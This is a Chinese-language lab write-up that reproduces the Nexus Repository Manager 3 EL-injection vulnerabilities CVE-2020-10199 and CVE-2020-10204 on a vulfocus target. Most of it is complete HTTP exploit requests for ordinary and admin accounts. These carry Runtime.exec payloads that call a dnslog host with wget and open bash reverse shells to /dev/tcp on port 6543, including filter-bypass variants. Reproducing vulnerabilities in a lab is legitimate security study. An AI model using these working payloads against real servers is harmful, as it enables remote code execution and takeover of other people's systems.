0x00 前言
本次漏洞复现使用
靶机:vulfocus
0x01 描述
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发 Maven 、 NuGET 等软件源仓库
Nexus Repository Manager官方发布了CVE-2020-10199,CVE-2020-10204的漏洞公告,10199的漏洞需要普通用户权限即可触发,而10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的
影响版本
Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
默认端口:
8081 Sonatype Nexus Repository 管理页面
复现准备
启动环境
image
每次启动环境映射的端口都不同,按照实际映射端口访问就可以看到Web界面了
image
预留的用户名/密码:
admin/admin
0x02 漏洞复现(普通账号执行方法)
此方法普通账号和管理员账号皆适用
image
登陆后替换Cookie和CSRF Token,发送数据包,即可执行EL表达式
POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close
{
"name": "internal",
"online": true,
"storage": {
"blobStoreName": "default",
"strictContentTypeValidation": true
},
"group": {
"memberNames": ["$\\A{233*233*233}"]
}
}
image
image
DNSlog 测试
进行 DNSlog 尝试,开始尝试使用 ping 、curl 都无法成功执行 EL 表达式,最后尝试使用了 wget 命令成功获取请求记录
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('wget hvqkwp.dnslog.cn')}
image
反弹shell
开始直接使用下面语句进行反弹并无任何反应
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('bash -i >& /dev/tcp/xx.xx.xx.xx/6543 0>&1')}
经过资料查阅,发现了存在的问题:
https://blog.spoock.com/2018/11/25/getshell-bypass-exec/
经过多次尝试,最终的payload
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xx.xx.xx.xx/6543 0>&1')}
image
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/xx.xx.xx.xx/6543<&1')}
image
2.3 漏洞复现(管理员账号执行方法)
此方法只适用于管理员账号
POST /service/extdirect HTTP/1.1
Host: 118.193.36.37:64521
Content-Length: 290
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.8501743136715239
Content-Type: application/json
Accept: */*
Origin: http://118.193.36.37:64521
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://118.193.36.37:64521/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.8501743136715239; _ga=GA1.1.1177666056.1593768292; _gid=GA1.1.174097340.1593768292; NXSESSIONID=8c94eba8-2764-4b02-801f-e4c58769cb4d
Connection: close
{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('wget im87gx.dnslog.cn')}"],"roles":[]}],"type":"rpc","tid":89}
注意替换 Cookie 和 CSRF-TOKEN
image
